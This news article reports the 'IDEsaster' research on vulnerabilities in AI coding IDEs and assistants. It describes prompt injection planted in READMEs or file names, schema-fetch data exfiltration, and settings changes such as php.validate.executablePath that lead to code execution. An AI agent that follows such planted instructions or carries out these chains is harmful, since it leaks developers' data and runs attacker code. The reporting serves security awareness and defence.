A recent six-month security investigation has uncovered a widespread and critical vulnerability class across the entire ecosystem of AI-assisted development tools. Dubbed the “IDEsaster” research, the findings detail over thirty security flaws that can be exploited for sensitive data exfiltration and, in some serious cases, full remote code execution (RCE).
The research paints a bleak picture: 100% of tested AI IDEs and coding assistants were found to be vulnerable. This includes major platforms like Visual Studio Code and JetBrains products, as well as popular assistants such as GitHub Copilot, Cursor, Gemini CLI, and Claude Code. The flaws have already led to the assignment of at least twenty-four CVEs.
The core problem, according to the report, is a fundamental conflict between legacy IDE design and the new autonomous capabilities of AI agents. Traditional IDEs were not designed with components capable of reading, editing, and generating files on their own. When AI agents gained these abilities, previously safe, long-standing features instantly became attack surfaces.
Security researcher Ari Marzouk emphasized that every AI IDE tested “effectively ignore[s] the base software… in their threat model.” They mistakenly treat old features as inherently safe, but the addition of autonomous AI agents weaponizes these features into tools for data exfiltration and RCE.
The attack follows an “IDE-agnostic attack chain” that begins with context hijacking, typically via prompt injection. This involves planting hidden instructions in seemingly innocuous files like READMEs or file names. Once the AI agent processes this malicious context, it can be directed to perform a seemingly legitimate action that triggers an unsafe behavior in the underlying IDE software.
One documented exploit involves an AI agent writing a JSON file that contains a reference to a remote schema. The IDE then automatically attempts to fetch this remote schema, inadvertently leaking sensitive data that the agent had collected earlier in the process. This specific behavior was demonstrated across Visual Studio Code, JetBrains IDEs, and Zed.
Another alarming case study showed how an attacker could achieve full remote code execution. This is done by manipulating IDE settings, such as modifying configuration fields like php.validate.executablePath, to point to a malicious file within the workspace. The IDE is then tricked into running arbitrary attacker code the moment a related file type is opened.
The research concludes that a short-term fix is impossible because current IDEs were not built on the principle of being “Secure for AI.” While immediate mitigations exist for developers and tool vendors, the only long-term solution requires a complete and fundamental redesign of how IDEs allow AI agents to interact with and act within project files.